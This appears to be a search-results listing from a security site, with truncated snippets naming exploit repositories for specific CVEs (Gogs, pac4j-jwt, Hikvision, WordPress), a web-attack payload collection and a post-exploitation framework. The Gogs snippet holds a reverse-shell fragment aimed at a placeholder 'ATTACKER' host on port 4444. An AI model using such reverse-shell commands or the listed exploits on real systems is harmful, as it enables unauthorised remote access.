683 matches found
LLM-Guided Prompt Evolution for Password Guessing
Passwords still remain a dominant authentication method, yet their security is routinely subverted by predictable user choices and large-scale credential leaks. Automated password guessing is a key tool for stress-testing password policies and modeling attacker behavior. This paper applies...
Exploit for Deserialization of Untrusted Data in Facebook React
R2SAE - React2Shell Auto-Exploit A Firefox extension...
Exploit for Path Traversal in Gogs
CVE-2025-8110 — Gogs & /dev/tcp/ATTACKER/4444 0&1"' Cleanu...
Terrapack TkWebCoreNG File Upload Endpoint Audit Tool
This Python script is a simple security audit tool designed to test the file upload interface of applications using TkWebCoreNG. It does not actual exploit anything...
Exploit for Argument Injection in Gnu Inetutils
Telnet Vulnerability Scanner CVE-2026-24061 & CVE-2026-32746...
Caido-Plugin
Github • Documentation  ...
7 Best CTEM Tools to Reduce Your Attack Surface
To truly secure your organization, you have to start thinking like an attacker. An adversary doesn’t care about your endless spreadsheet of CVEs; they look for a single, exploitable path to their objective. So, how do you find that path before they do? You start by using threat intelligence to...
web-attack-payloads
Web Attack Payloads Collection !Cybersecurityhttps://img.s...
PT-2026-25586
Summary Prior to Memray 1.19.2, Memray rendered the command line of the tracked process directly into generated HTML reports without escaping. Because there was no escaping, attacker-controlled command line arguments were inserted as raw HTML into the generated report. This allowed JavaScript...
Exploit for CVE-2026-29000
CVE-2026-29000: pac4j-jwt Authentication Bypass POC This repo...
Microsoft Windows Service Binary Misconfiguration Tester
This document and included Metasploit module analyze the security risks associated with improper Windows service configurations, specifically focusing on writable service binary paths that may lead to privilege escalation. Note that this condition does not occur on a default Windows installation...
Exploit for Cross-site Scripting in Quantizor Markdown-To-Jsx
███████╗██╗ ██╗ █████╗ ██████╗ ██╗███╗ ██╗ ██████╗ █████...
Exploit for Allocation of Resources Without Limits or Throttling in Espressif Esp-Idf
CVE-2024-51428 - ZoneMinder Blind SQL Injection PoC Python wr...
Exploit for CVE-2026-0709
Hikvision Wireless AP – CVE-2026-0709 Authenticated RCE Tool...
Plasma
Plasma !Pythonhttps://img.shields.io/badge/python-3.10%2B-...
Exploit for OS Command Injection in Frigate
⚠️ CVE-2026-25643 - Detect and Analyze Remote Code Execution...
Exploit for CVE-2011-1473
CVE-2011-1473-POC CVE-20...
How HiveForce Labs Finds Threats Before They Hit
There’s often a huge gap between knowing about a threat and knowing if you’re protected from it. A threat feed might tell you about a new attack campaign, but that information lives in a report. It doesn't tell you what would happen if that same attack hit your network. This is the difference...
Exploit for CVE-2026-23550
CVE-2026-23550 Dedsec WordPress Exploitation Author:...
MightyBots
🦠 MightyBots An Educational Post-Exploitation Framework fo...